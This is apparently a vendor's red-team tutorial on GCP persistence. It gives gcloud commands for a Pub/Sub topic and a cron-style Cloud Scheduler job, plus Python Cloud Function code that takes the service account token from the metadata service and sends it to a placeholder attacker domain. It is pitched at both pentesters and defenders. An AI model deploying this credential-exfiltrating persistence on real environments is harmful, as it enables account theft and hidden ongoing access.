Introduction

Nowadays, the vast majority of companies are running in the cloud. AWS, GCP (Google Cloud infrastructure / Google Cloud Platform), and Azure are some of the most popular cloud providers out there, so as a security engineer, it's important to be well-equipped to handle these types of engagements. Performing a security engagement on cloud providers can be relatively hard due to the lack of information around redteaming and cloud penetration testing networks.  Google Cloud Provider (GCP) is one cloud provider you might run into during an engagement, so it is important to tackle GCP penetration testing. For a complete guide on cloud security, download the eBook written from a hacker's perspective. This guide will help you understand GCP vulnerability assessment and penetration testing.

If you're performing a red team exercise, setting up persistence penetration testing in your target environment is key. No one wants to lose days of work due to losing access to your target, which is why you need to know a few persistence techniques. These techniques are also great for the blue team and threat hunters, so they know what to look for when searching for signs of compromise.

Cron Job

If you’re familiar with Linux cron jobs, Google Cloud Scheduler is the same thing. It's common for linux malware to use cron jobs for persistence, and the same technique can be used in the Google cloud penetration testing.

These cron jobs can be used as triggers for many things, but I'll be using it to send a Pub/Sub message. We can then set up a cloud function that will be triggered when it receives a Pub/Sub message. The cloud function can do anything you want, but I'll be using it to send  service account credentials to an attacker's machine. 

This attack only involves three steps, as shown below:

• Create a pub/sub topic
• Create a cron job task
• Create the malicious cloud function

 The first step is to create a Pub/Sub topic, as shown below. This topic will be used to trigger the cloud function every time a cron job fires. 

• gcloud pubsub topics create test

Next create a cron job. In this example, I'll create a cron job that executes every minute. This cron job will post a message to a Pub/Sub topic ultimately triggering the malicious cloud function.

• gcloud scheduler jobs create pubsub myjob --schedule "* * * * *" --topic mytopic  --message-body "Hello"

Finally, create the malicious cloud function. This function should be used to do some malicious action. In this example, it will send the attacker an authentication token.

• gcloud functions deploy <CLOUD-FUNCTION-NAME>--entry-point <PYTHON-FUNCTION-NAME>--runtime python37 --trigger-topic=<TOPIC-NAME>

As you can see in the below image, the cloud function’s source code is fairly simple. First, we hit the metadata service to grab the attached service account’s authentication token. Then we send this to the attacker via a GET request.

import requests

import json

def evil_pubsub(event, context):

    """Triggered from a message on a Cloud Pub/Sub topic.

    Args:

         event (dict): Event payload.

         context (google.cloud.functions.Context): Metadata for the event.

    """

    r = requests.get(url = "http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token",headers={"Metadata-Flavor":"Google"})

    PARAMS = {"data":r.text}

    requests.get(url="http://<ATTCKER-DOMAIN-HERE>/",params = PARAMS)

Once the cron job runs, it will send a message to the Pub/Sub topic. The malicious cloud function will be  listening to this topic and when triggered, it  grabs the attached service account creds and sends them to the attacker's machine.

Cron jobs have been used as a persistence technique for years, and we can use the same techniques for persistence in the cloud.

Red Sentry Cloud Scanner

If you want to check the security posture of your company's cloud environment, Red Sentry has a very impressive cloud scanner that identify security vulnerabilities, checks for misconfigurations, privilege escalation, and much more in AWS, GCP, and Azure environments. After the scan, you can download a full report on the findings and view our recommendations on how to fix the vulnerabilities found. In addition to our cloud scanner, we also offer traditional penetration testing of various cloud environments. 

If you want us to look at your cloud environment so you can better secure yourself, schedule a manual pentest or sign up our cloud vulnerability scanner today!

Conclusion

The cloud is still relatively new, but it's being adopted by almost everyone. As a security professional, it's important to understand the types of attacks that can be performed on these environments. Being able to set up persistence in your target’s environment, or if you're on the defensive side, being able to detect persistent techniques, is vital. A cron job is one of many persistence techniques that can be used on GCP pentesting. It's relatively easy to set up and can easily go unnoticed by defenders if they aren't aware of this technique. For a complete guide on cloud security, download the eBook written from a hacker's perspective.